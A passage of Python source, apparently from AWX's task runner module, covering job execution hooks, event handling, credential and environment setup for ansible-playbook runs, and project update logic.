job_timeout = global_timeout if local_timeout == 0 else local_timeout
job_timeout = 0 if local_timeout < 0 else job_timeout
else:
job_timeout = 0
return job_timeout
def get_password_prompts(self, passwords={}):
"""
Return a dictionary where keys are strings or regular expressions for
prompts, and values are password lookup keys (keys that are returned
from build_passwords).
"""
return OrderedDict()
def create_expect_passwords_data_struct(self, password_prompts, passwords):
expect_passwords = {}
for k, v in password_prompts.items():
expect_passwords[k] = passwords.get(v, '') or ''
return expect_passwords
def pre_run_hook(self, instance, private_data_dir):
"""
Hook for any steps to run before the job/task starts
"""
instance.log_lifecycle("pre_run")
def post_run_hook(self, instance, status):
"""
Hook for any steps to run before job/task is marked as complete.
"""
instance.log_lifecycle("post_run")
def final_run_hook(self, instance, status, private_data_dir, fact_modification_times):
"""
Hook for any steps to run after job/task is marked as complete.
"""
instance.log_lifecycle("finalize_run")
job_profiling_dir = os.path.join(private_data_dir, 'artifacts/playbook_profiling')
awx_profiling_dir = '/var/log/tower/playbook_profiling/'
collections_info = os.path.join(private_data_dir, 'artifacts/', 'collections.json')
ansible_version_file = os.path.join(private_data_dir, 'artifacts/', 'ansible_version.txt')
if not os.path.exists(awx_profiling_dir):
os.mkdir(awx_profiling_dir)
if os.path.isdir(job_profiling_dir):
shutil.copytree(job_profiling_dir, os.path.join(awx_profiling_dir, str(instance.pk)))
if os.path.exists(collections_info):
with open(collections_info) as ee_json_info:
ee_collections_info = json.loads(ee_json_info.read())
instance.installed_collections = ee_collections_info
instance.save(update_fields=['installed_collections'])
if os.path.exists(ansible_version_file):
with open(ansible_version_file) as ee_ansible_info:
ansible_version_info = ee_ansible_info.readline()
instance.ansible_version = ansible_version_info
instance.save(update_fields=['ansible_version'])
def event_handler(self, event_data):
#
# ⚠️ D-D-D-DANGER ZONE ⚠️
# This method is called once for *every event* emitted by Ansible
# Runner as a playbook runs. That means that changes to the code in
# this method are _very_ likely to introduce performance regressions.
#
# Even if this function is made on average .05s slower, it can have
# devastating performance implications for playbooks that emit
# tens or hundreds of thousands of events.
#
# Proceed with caution!
#
"""
Ansible runner puts a parent_uuid on each event, no matter what the type.
AWX only saves the parent_uuid if the event is for a Job.
"""
# cache end_line locally for RunInventoryUpdate tasks
# which generate job events from two 'streams':
# ansible-inventory and the awx.main.commands.inventory_import
# logger
if isinstance(self, RunInventoryUpdate):
self.end_line = event_data['end_line']
if event_data.get(self.event_data_key, None):
if self.event_data_key != 'job_id':
event_data.pop('parent_uuid', None)
if self.parent_workflow_job_id:
event_data['workflow_job_id'] = self.parent_workflow_job_id
if self.host_map:
host = event_data.get('event_data', {}).get('host', '').strip()
if host:
event_data['host_name'] = host
if host in self.host_map:
event_data['host_id'] = self.host_map[host]
else:
event_data['host_name'] = ''
event_data['host_id'] = ''
if event_data.get('event') == 'playbook_on_stats':
event_data['host_map'] = self.host_map
if isinstance(self, RunProjectUpdate):
# it's common for Ansible's SCM modules to print
# error messages on failure that contain the plaintext
# basic auth credentials (username + password)
# it's also common for the nested event data itself (['res']['...'])
# to contain unredacted text on failure
# this is a _little_ expensive to filter
# with regex, but project updates don't have many events,
# so it *should* have a negligible performance impact
task = event_data.get('event_data', {}).get('task_action')
try:
if task in ('git', 'svn'):
event_data_json = json.dumps(event_data)
event_data_json = UriCleaner.remove_sensitive(event_data_json)
event_data = json.loads(event_data_json)
except json.JSONDecodeError:
pass
if 'event_data' in event_data:
event_data['event_data']['guid'] = self.guid
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
self.event_ct += 1
'''
Handle artifacts
'''
if event_data.get('event_data', {}).get('artifact_data', {}):
self.instance.artifacts = event_data['event_data']['artifact_data']
self.instance.save(update_fields=['artifacts'])
return False
def cancel_callback(self):
"""
Ansible runner callback to tell the job when/if it is canceled
"""
unified_job_id = self.instance.pk
self.instance = self.update_model(unified_job_id)
if not self.instance:
logger.error('unified job {} was deleted while running, canceling'.format(unified_job_id))
return True
if self.instance.cancel_flag or self.instance.status == 'canceled':
cancel_wait = (now() - self.instance.modified).seconds if self.instance.modified else 0
if cancel_wait > 5:
logger.warning('Request to cancel {} took {} seconds to complete.'.format(self.instance.log_format, cancel_wait))
return True
return False
def finished_callback(self, runner_obj):
"""
Ansible runner callback triggered on finished run
"""
event_data = {
'event': 'EOF',
'final_counter': self.event_ct,
'guid': self.guid,
}
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
def status_handler(self, status_data, runner_config):
"""
Ansible runner callback triggered on status transition
"""
if status_data['status'] == 'starting':
job_env = dict(runner_config.env)
'''
Overwrite the recorded job environment with the safe (redacted) values
'''
for k, v in self.safe_env.items():
if k in job_env:
job_env[k] = v
self.instance = self.update_model(self.instance.pk, job_args=json.dumps(runner_config.command), job_cwd=runner_config.cwd, job_env=job_env)
elif status_data['status'] == 'error':
result_traceback = status_data.get('result_traceback', None)
if result_traceback:
self.instance = self.update_model(self.instance.pk, result_traceback=result_traceback)
@with_path_cleanup
def run(self, pk, **kwargs):
"""
Run the job/task and capture its output.
"""
self.instance = self.model.objects.get(pk=pk)
if self.instance.execution_environment_id is None:
from awx.main.signals import disable_activity_stream
with disable_activity_stream():
self.instance = self.update_model(self.instance.pk, execution_environment=self.instance.resolve_execution_environment())
# keep the job on self.instance because of the update_model pattern and because it is used in callback handlers
self.instance = self.update_model(pk, status='running', start_args='') # blank field to remove encrypted passwords
self.instance.websocket_emit_status("running")
status, rc = 'error', None
extra_update_fields = {}
fact_modification_times = {}
self.event_ct = 0
'''
Needs to be an object property because status_handler uses it in a callback context
'''
self.safe_env = {}
self.safe_cred_env = {}
private_data_dir = None
# store a reference to the parent workflow job (if any) so we can include
# it in event data JSON
if self.instance.spawned_by_workflow:
self.parent_workflow_job_id = self.instance.get_workflow_job().id
try:
self.instance.send_notification_templates("running")
private_data_dir = self.build_private_data_dir(self.instance)
self.pre_run_hook(self.instance, private_data_dir)
self.instance.log_lifecycle("preparing_playbook")
if self.instance.cancel_flag:
self.instance = self.update_model(self.instance.pk, status='canceled')
if self.instance.status != 'running':
# Stop the task chain and prevent starting the job if it has
# already been canceled.
self.instance = self.update_model(pk)
status = self.instance.status
raise RuntimeError('not starting %s task' % self.instance.status)
if not os.path.exists(settings.AWX_ISOLATION_BASE_PATH):
raise RuntimeError('AWX_ISOLATION_BASE_PATH=%s does not exist' % settings.AWX_ISOLATION_BASE_PATH)
# store a record of the venv used at runtime
if hasattr(self.instance, 'custom_virtualenv'):
self.update_model(pk, custom_virtualenv=getattr(self.instance, 'ansible_virtualenv_path', settings.ANSIBLE_VENV_PATH))
# Fetch "cached" fact data from prior runs and put on the disk
# where ansible expects to find it
if getattr(self.instance, 'use_fact_cache', False):
self.instance.start_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', str(self.instance.id), 'fact_cache'),
fact_modification_times,
)
# May have to serialize the value
private_data_files = self.build_private_data_files(self.instance, private_data_dir)
passwords = self.build_passwords(self.instance, kwargs)
self.build_extra_vars_file(self.instance, private_data_dir)
args = self.build_args(self.instance, private_data_dir, passwords)
env = self.build_env(self.instance, private_data_dir, private_data_files=private_data_files)
self.safe_env = build_safe_env(env)
credentials = self.build_credentials_list(self.instance)
for credential in credentials:
if credential:
credential.credential_type.inject_credential(credential, env, self.safe_cred_env, args, private_data_dir)
self.safe_env.update(self.safe_cred_env)
self.write_args_file(private_data_dir, args)
password_prompts = self.get_password_prompts(passwords)
expect_passwords = self.create_expect_passwords_data_struct(password_prompts, passwords)
params = {
'ident': self.instance.id,
'private_data_dir': private_data_dir,
'playbook': self.build_playbook_path_relative_to_cwd(self.instance, private_data_dir),
'inventory': self.build_inventory(self.instance, private_data_dir),
'passwords': expect_passwords,
'envvars': env,
'settings': {
'job_timeout': self.get_instance_timeout(self.instance),
'suppress_ansible_output': True,
},
}
if isinstance(self.instance, AdHocCommand):
params['module'] = self.build_module_name(self.instance)
params['module_args'] = self.build_module_args(self.instance)
if getattr(self.instance, 'use_fact_cache', False):
# Enable Ansible fact cache.
params['fact_cache_type'] = 'jsonfile'
else:
# Disable Ansible fact cache.
params['fact_cache_type'] = ''
if self.instance.is_container_group_task or settings.IS_K8S:
params['envvars'].pop('HOME', None)
'''
Delete parameters if the values are None or empty array
'''
for v in ['passwords', 'playbook', 'inventory']:
if not params[v]:
del params[v]
self.dispatcher = CallbackQueueDispatcher()
self.instance.log_lifecycle("running_playbook")
if isinstance(self.instance, SystemJob):
cwd = self.build_cwd(self.instance, private_data_dir)
res = ansible_runner.interface.run(
project_dir=cwd, event_handler=self.event_handler, finished_callback=self.finished_callback, status_handler=self.status_handler, **params
)
else:
receptor_job = AWXReceptorJob(self, params)
self.unit_id = receptor_job.unit_id
res = receptor_job.run()
if not res:
return
status = res.status
rc = res.rc
if status == 'timeout':
self.instance.job_explanation = "Job terminated due to timeout"
status = 'failed'
extra_update_fields['job_explanation'] = self.instance.job_explanation
# ensure failure notification sends even if playbook_on_stats event is not triggered
handle_success_and_failure_notifications.apply_async([self.instance.job.id])
except InvalidVirtualenvError as e:
extra_update_fields['job_explanation'] = e.message
logger.error('{} {}'.format(self.instance.log_format, e.message))
except Exception:
# this could catch programming or file system errors
extra_update_fields['result_traceback'] = traceback.format_exc()
logger.exception('%s Exception occurred while running task', self.instance.log_format)
finally:
logger.debug('%s finished running, producing %s events.', self.instance.log_format, self.event_ct)
try:
self.post_run_hook(self.instance, status)
except PostRunError as exc:
if status == 'successful':
status = exc.status
extra_update_fields['job_explanation'] = exc.args[0]
if exc.tb:
extra_update_fields['result_traceback'] = exc.tb
except Exception:
logger.exception('{} Post run hook errored.'.format(self.instance.log_format))
self.instance = self.update_model(pk)
self.instance = self.update_model(pk, status=status, emitted_events=self.event_ct, **extra_update_fields)
try:
self.final_run_hook(self.instance, status, private_data_dir, fact_modification_times)
except Exception:
logger.exception('{} Final run hook errored.'.format(self.instance.log_format))
self.instance.websocket_emit_status(status)
if status != 'successful':
if status == 'canceled':
raise AwxTaskError.TaskCancel(self.instance, rc)
else:
raise AwxTaskError.TaskError(self.instance, rc)
@task(queue=get_local_queuename)
class RunJob(BaseTask):
"""
Run a job using ansible-playbook.
"""
model = Job
event_model = JobEvent
event_data_key = 'job_id'
def build_private_data(self, job, private_data_dir):
"""
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
private_data = {'credentials': {}}
for credential in job.credentials.prefetch_related('input_sources__source_credential').all():
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
if credential.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[credential] = credential.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, job, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user, sudo/su
and ansible-vault.
"""
passwords = super(RunJob, self).build_passwords(job, runtime_passwords)
cred = job.machine_credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password', 'vault_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
for cred in job.vault_credentials:
field = 'vault_password'
vault_id = cred.get_input('vault_id', default=None)
if vault_id:
field = 'vault_password.{}'.format(vault_id)
if field in passwords:
raise RuntimeError('multiple vault credentials were specified with --vault-id {}@prompt'.format(vault_id))
value = runtime_passwords.get(field, cred.get_input('vault_password', default=''))
if value not in ('', 'ASK'):
passwords[field] = value
'''
Only 1 value can be provided for a unique prompt string. Prefer ssh
key unlock over network key unlock.
'''
if 'ssh_key_unlock' not in passwords:
for cred in job.network_credentials:
if cred.inputs.get('ssh_key_unlock'):
passwords['ssh_key_unlock'] = runtime_passwords.get('ssh_key_unlock', cred.get_input('ssh_key_unlock', default=''))
break
return passwords
def build_env(self, job, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunJob, self).build_env(job, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Set environment variables needed for inventory and job event
# callbacks to work.
env['JOB_ID'] = str(job.pk)
env['INVENTORY_ID'] = str(job.inventory.pk)
if job.project:
env['PROJECT_REVISION'] = job.project.scm_revision
env['ANSIBLE_RETRY_FILES_ENABLED'] = "False"
env['MAX_EVENT_RES'] = str(settings.MAX_EVENT_RES_DATA)
if hasattr(settings, 'AWX_ANSIBLE_CALLBACK_PLUGINS') and settings.AWX_ANSIBLE_CALLBACK_PLUGINS:
env['ANSIBLE_CALLBACK_PLUGINS'] = ':'.join(settings.AWX_ANSIBLE_CALLBACK_PLUGINS)
env['AWX_HOST'] = settings.TOWER_URL_BASE
# Create a directory for ControlPath sockets that is unique to each job
cp_dir = os.path.join(private_data_dir, 'cp')
if not os.path.exists(cp_dir):
os.mkdir(cp_dir, 0o700)
# FIXME: more elegant way to manage this path in container
env['ANSIBLE_SSH_CONTROL_PATH_DIR'] = '/runner/cp'
# Set environment variables for cloud credentials.
cred_files = private_data_files.get('credentials', {})
for cloud_cred in job.cloud_credentials:
if cloud_cred and cloud_cred.credential_type.namespace == 'openstack':
env['OS_CLIENT_CONFIG_FILE'] = os.path.join('/runner', os.path.basename(cred_files.get(cloud_cred, '')))
for network_cred in job.network_credentials:
env['ANSIBLE_NET_USERNAME'] = network_cred.get_input('username', default='')
env['ANSIBLE_NET_PASSWORD'] = network_cred.get_input('password', default='')
ssh_keyfile = cred_files.get(network_cred, '')
if ssh_keyfile:
env['ANSIBLE_NET_SSH_KEYFILE'] = ssh_keyfile
authorize = network_cred.get_input('authorize', default=False)
env['ANSIBLE_NET_AUTHORIZE'] = str(int(authorize))
if authorize:
env['ANSIBLE_NET_AUTH_PASS'] = network_cred.get_input('authorize_password', default='')
path_vars = (
('ANSIBLE_COLLECTIONS_PATHS', 'collections_paths', 'requirements_collections', '~/.ansible/collections:/usr/share/ansible/collections'),
('ANSIBLE_ROLES_PATH', 'roles_path', 'requirements_roles', '~/.ansible/roles:/usr/share/ansible/roles:/etc/ansible/roles'),
)
config_values = read_ansible_config(job.project.get_project_path(), list(map(lambda x: x[1], path_vars)))
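# For each path-style setting the precedence is: an existing environment
# variable, then the project's ansible.cfg value, then the defaults above.
# The requirements folder inside the container (/runner/<folder>) is always
# prepended last so it takes priority.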
for env_key, config_setting, folder, default in path_vars:
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
# FIXME: again, figure out more elegant way for inside container
paths = [os.path.join('/runner', folder)] + paths
env[env_key] = os.pathsep.join(paths)
return env
def build_args(self, job, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
creds = job.machine_credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible-playbook's default of using
# the current user.
ssh_username = ssh_username or 'root'
args = []
if job.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
if job.become_enabled:
args.append('--become')
if job.diff_mode:
args.append('--diff')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
# Support prompting for multiple vault passwords
for k, v in passwords.items():
if k.startswith('vault_password'):
if k == 'vault_password':
args.append('--ask-vault-pass')
else:
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
args.append('--vault-id')
args.append('{}@prompt'.format(vault_id))
if job.forks:
if settings.MAX_FORKS > 0 and job.forks > settings.MAX_FORKS:
logger.warning(f'Maximum number of forks ({settings.MAX_FORKS}) exceeded.')
args.append('--forks=%d' % settings.MAX_FORKS)
else:
args.append('--forks=%d' % job.forks)
if job.force_handlers:
args.append('--force-handlers')
if job.limit:
args.extend(['-l', job.limit])
if job.verbosity:
args.append('-%s' % ('v' * min(5, job.verbosity)))
if job.job_tags:
args.extend(['-t', job.job_tags])
if job.skip_tags:
args.append('--skip-tags=%s' % job.skip_tags)
if job.start_at_task:
args.append('--start-at-task=%s' % job.start_at_task)
return args
def build_cwd(self, job, private_data_dir):
return os.path.join(private_data_dir, 'project')
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return job.playbook
def build_extra_vars_file(self, job, private_data_dir):
# Define special extra_vars for AWX, combine with job.extra_vars.
extra_vars = job.awx_meta_vars()
if job.extra_vars_dict:
extra_vars.update(json.loads(job.decrypted_extra_vars()))
# By default, all extra vars disallow Jinja2 template usage for
# security reasons; top level key-values defined in JT.extra_vars, however,
# are allowed as "safe" (because they can only be set by users with
# higher levels of privilege - those that have the ability create and
# edit Job Templates)
safe_dict = {}
if job.job_template and settings.ALLOW_JINJA_IN_EXTRA_VARS == 'template':
safe_dict = job.job_template.extra_vars_dict
return self._write_extra_vars_file(private_data_dir, extra_vars, safe_dict)
def build_credentials_list(self, job):
return job.credentials.prefetch_related('input_sources__source_credential').all()
def get_password_prompts(self, passwords={}):
d = super(RunJob, self).get_password_prompts(passwords)
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
d[r'Vault password:\s*?$'] = 'vault_password'
for k, v in passwords.items():
if k.startswith('vault_password.'):
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
d[r'Vault password \({}\):\s*?$'.format(vault_id)] = k
return d
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunJob, self).build_execution_environment_params(instance, private_data_dir)
        # If fact caching is enabled and the Insights directory exists but is not already mounted, mount it into the container
insights_dir = os.path.dirname(settings.INSIGHTS_SYSTEM_ID_FILE)
if instance.use_fact_cache and os.path.exists(insights_dir):
            logger.info('Mounting Insights directory {} into the execution environment'.format(insights_dir))
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{insights_dir}:{insights_dir}:Z",
]
)
return params
def pre_run_hook(self, job, private_data_dir):
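        """Validate that the job has an inventory, project, and execution environment, then run a
        blocking project sync when the local checkout is missing, stale, or a branch override is
        requested; otherwise copy the existing project content into the job's private data dir."""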
super(RunJob, self).pre_run_hook(job, private_data_dir)
if job.inventory is None:
error = _('Job could not start because it does not have a valid inventory.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.project is None:
error = _('Job could not start because it does not have a valid project.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.execution_environment is None:
error = _('Job could not start because no Execution Environment could be found.')
self.update_model(job.pk, status='error', job_explanation=error)
raise RuntimeError(error)
elif job.project.status in ('error', 'failed'):
msg = _('The project revision for this job template is unknown due to a failed update.')
job = self.update_model(job.pk, status='failed', job_explanation=msg)
raise RuntimeError(msg)
project_path = job.project.get_project_path(check_if_exists=False)
job_revision = job.project.scm_revision
sync_needs = []
source_update_tag = 'update_{}'.format(job.project.scm_type)
branch_override = bool(job.scm_branch and job.scm_branch != job.project.scm_branch)
if not job.project.scm_type:
pass # manual projects are not synced, user has responsibility for that
elif not os.path.exists(project_path):
logger.debug('Performing fresh clone of {} on this instance.'.format(job.project))
sync_needs.append(source_update_tag)
elif job.project.scm_type == 'git' and job.project.scm_revision and (not branch_override):
try:
git_repo = git.Repo(project_path)
if job_revision == git_repo.head.commit.hexsha:
logger.debug('Skipping project sync for {} because commit is locally available'.format(job.log_format))
else:
sync_needs.append(source_update_tag)
except (ValueError, BadGitName, git.exc.InvalidGitRepositoryError):
logger.debug('Needed commit for {} not in local source tree, will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
else:
logger.debug('Project not available locally, {} will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
has_cache = os.path.exists(os.path.join(job.project.get_cache_path(), job.project.cache_id))
# Galaxy requirements are not supported for manual projects
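        # Re-install roles/collections when there is no content cache for this project, or when the
        # branch is overridden, since cached content may not match the override branch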
if job.project.scm_type and ((not has_cache) or branch_override):
sync_needs.extend(['install_roles', 'install_collections'])
if sync_needs:
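            # Launch an inline project update ("sync") on this node so the job runs against the
            # expected revision and has roles/collections staged for it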
pu_ig = job.instance_group
pu_en = job.execution_node
sync_metafields = dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
instance_group=pu_ig,
execution_node=pu_en,
celery_task_id=job.celery_task_id,
)
if branch_override:
sync_metafields['scm_branch'] = job.scm_branch
if 'update_' not in sync_metafields['job_tags']:
sync_metafields['scm_revision'] = job_revision
local_project_sync = job.project.create_project_update(_eager_fields=sync_metafields)
# save the associated job before calling run() so that a
# cancel() call on the job can cancel the project update
job = self.update_model(job.pk, project_update=local_project_sync)
project_update_task = local_project_sync._get_task_class()
try:
# the job private_data_dir is passed so sync can download roles and collections there
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
job = self.update_model(job.pk, scm_revision=local_project_sync.scm_revision)
except Exception:
local_project_sync.refresh_from_db()
if local_project_sync.status != 'canceled':
job = self.update_model(
job.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
job.refresh_from_db()
if job.cancel_flag:
return
else:
            # Case where a local sync is not needed: the local tree is already
            # up-to-date with the project, so the job runs the project's current version
if job_revision:
job = self.update_model(job.pk, scm_revision=job_revision)
# Project update does not copy the folder, so copy here
RunProjectUpdate.make_local_copy(job.project, private_data_dir, scm_revision=job_revision)
if job.inventory.kind == 'smart':
            # cache smart inventory memberships so that the host_filter query is not
            # run inside the event-saving code
update_smart_memberships_for_inventory(job.inventory)
def final_run_hook(self, job, status, private_data_dir, fact_modification_times):
super(RunJob, self).final_run_hook(job, status, private_data_dir, fact_modification_times)
if not private_data_dir:
# If there's no private data dir, that means we didn't get into the
# actual `run()` call; this _usually_ means something failed in
# the pre_run_hook method
return
if job.use_fact_cache:
job.finish_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', 'fact_cache'),
fact_modification_times,
)
try:
inventory = job.inventory
except Inventory.DoesNotExist:
pass
else:
if inventory is not None:
update_inventory_computed_fields.delay(inventory.id)
@task(queue=get_local_queuename)
class RunProjectUpdate(BaseTask):
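    """Run a project update: check out the project from source control and, depending on job_tags,
    install Galaxy roles and collections into the content cache."""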
model = ProjectUpdate
event_model = ProjectUpdateEvent
event_data_key = 'project_update_id'
def __init__(self, *args, job_private_data_dir=None, **kwargs):
super(RunProjectUpdate, self).__init__(*args, **kwargs)
self.playbook_new_revision = None
self.original_branch = None
self.job_private_data_dir = job_private_data_dir
def event_handler(self, event_data):
super(RunProjectUpdate, self).event_handler(event_data)
returned_data = event_data.get('event_data', {})
if returned_data.get('task_action', '') == 'set_fact':
returned_facts = returned_data.get('res', {}).get('ansible_facts', {})
if 'scm_version' in returned_facts:
self.playbook_new_revision = returned_facts['scm_version']
def build_private_data(self, project_update, private_data_dir):
"""
Return SSH private key data needed for this project update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
"""
private_data = {'credentials': {}}
if project_update.credential:
credential = project_update.credential
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
return private_data
def build_passwords(self, project_update, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key unlock and SCM
username/password.
"""
passwords = super(RunProjectUpdate, self).build_passwords(project_update, runtime_passwords)
if project_update.credential:
passwords['scm_key_unlock'] = project_update.credential.get_input('ssh_key_unlock', default='')
passwords['scm_username'] = project_update.credential.get_input('username', default='')
passwords['scm_password'] = project_update.credential.get_input('password', default='')
return passwords
def build_env(self, project_update, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunProjectUpdate, self).build_env(project_update, private_data_dir, private_data_files=private_data_files)
env['ANSIBLE_RETRY_FILES_ENABLED'] = str(False)
env['ANSIBLE_ASK_PASS'] = str(False)
env['ANSIBLE_BECOME_ASK_PASS'] = str(False)
env['DISPLAY'] = '' # Prevent stupid password popup when running tests.
# give ansible a hint about the intended tmpdir to work around issues
# like https://github.com/ansible/ansible/issues/30064
env['TMP'] = settings.AWX_ISOLATION_BASE_PATH
env['PROJECT_UPDATE_ID'] = str(project_update.pk)
if settings.GALAXY_IGNORE_CERTS:
env['ANSIBLE_GALAXY_IGNORE'] = True
# build out env vars for Galaxy credentials (in order)
galaxy_server_list = []
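        # Each Galaxy credential becomes a "serverN" entry; ansible-galaxy reads the per-server
        # ANSIBLE_GALAXY_SERVER_<ID>_URL/_TOKEN/_AUTH_URL variables and consults servers in
        # ANSIBLE_GALAXY_SERVER_LIST order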
if project_update.project.organization:
for i, cred in enumerate(project_update.project.organization.galaxy_credentials.all()):
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_URL'] = cred.get_input('url')
auth_url = cred.get_input('auth_url', default=None)
token = cred.get_input('token', default=None)
if token:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_TOKEN'] = token
if auth_url:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_AUTH_URL'] = auth_url
galaxy_server_list.append(f'server{i}')
if galaxy_server_list:
env['ANSIBLE_GALAXY_SERVER_LIST'] = ','.join(galaxy_server_list)
return env
def _build_scm_url_extra_vars(self, project_update):
"""
Helper method to build SCM url and extra vars with parameters needed
for authentication.
"""
extra_vars = {}
if project_update.credential:
scm_username = project_update.credential.get_input('username', default='')
scm_password = project_update.credential.get_input('password', default='')
else:
scm_username = ''
scm_password = ''
scm_type = project_update.scm_type
scm_url = update_scm_url(scm_type, project_update.scm_url, check_special_cases=False)
scm_url_parts = urlparse.urlsplit(scm_url)
# Prefer the username/password in the URL, if provided.
scm_username = scm_url_parts.username or scm_username
scm_password = scm_url_parts.password or scm_password
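        # For svn the credentials are passed as extra vars rather than in the URL; for ssh-style
        # URLs the password is dropped since key/agent auth is used. Whatever username/password
        # remain are folded into the rewritten URL by update_scm_url() below.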
if scm_username:
if scm_type == 'svn':
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_password = False
if scm_url_parts.scheme != 'svn+ssh':
scm_username = False
elif scm_url_parts.scheme.endswith('ssh'):
scm_password = False
elif scm_type in ('insights', 'archive'):
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_url = update_scm_url(scm_type, scm_url, scm_username, scm_password, scp_format=True)
else:
scm_url = update_scm_url(scm_type, scm_url, scp_format=True)
# Pass the extra accept_hostkey parameter to the git module.
if scm_type == 'git' and scm_url_parts.scheme.endswith('ssh'):
extra_vars['scm_accept_hostkey'] = 'true'
return scm_url, extra_vars
def build_inventory(self, instance, private_data_dir):
return 'localhost,'
def build_args(self, project_update, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
args = []
if getattr(settings, 'PROJECT_UPDATE_VVV', False):
args.append('-vvv')
if project_update.job_tags:
args.extend(['-t', project_update.job_tags])
return args
def build_extra_vars_file(self, project_update, private_data_dir):
extra_vars = {}
scm_url, extra_vars_new = self._build_scm_url_extra_vars(project_update)
extra_vars.update(extra_vars_new)
scm_branch = project_update.scm_branch
if project_update.job_type == 'run' and (not project_update.branch_override):
if project_update.project.scm_revision:
scm_branch = project_update.project.scm_revision
elif not scm_branch:
raise RuntimeError('Could not determine a revision to run from project.')
elif not scm_branch:
scm_branch = 'HEAD'
galaxy_creds_are_defined = project_update.project.organization and project_update.project.organization.galaxy_credentials.exists()
if not galaxy_creds_are_defined and (settings.AWX_ROLES_ENABLED or settings.AWX_COLLECTIONS_ENABLED):
            logger.warning(f'Galaxy role/collection syncing is enabled, but no credentials are configured for {project_update.project.organization}.')
extra_vars.update(
{
'projects_root': settings.PROJECTS_ROOT.rstrip('/'),
'local_path': os.path.basename(project_update.project.local_path),
'project_path': project_update.get_project_path(check_if_exists=False), # deprecated
'insights_url': settings.INSIGHTS_URL_BASE,
'awx_license_type': get_license().get('license_type', 'UNLICENSED'),
'awx_version': get_awx_version(),
'scm_url': scm_url,
'scm_branch': scm_branch,
'scm_clean': project_update.scm_clean,
'scm_track_submodules': project_update.scm_track_submodules,
'roles_enabled': galaxy_creds_are_defined and settings.AWX_ROLES_ENABLED,
'collections_enabled': galaxy_creds_are_defined and settings.AWX_COLLECTIONS_ENABLED,
}
)
# apply custom refspec from user for PR refs and the like
if project_update.scm_refspec:
extra_vars['scm_refspec'] = project_update.scm_refspec
elif project_update.project.allow_override:
# If branch is override-able, do extra fetch for all branches
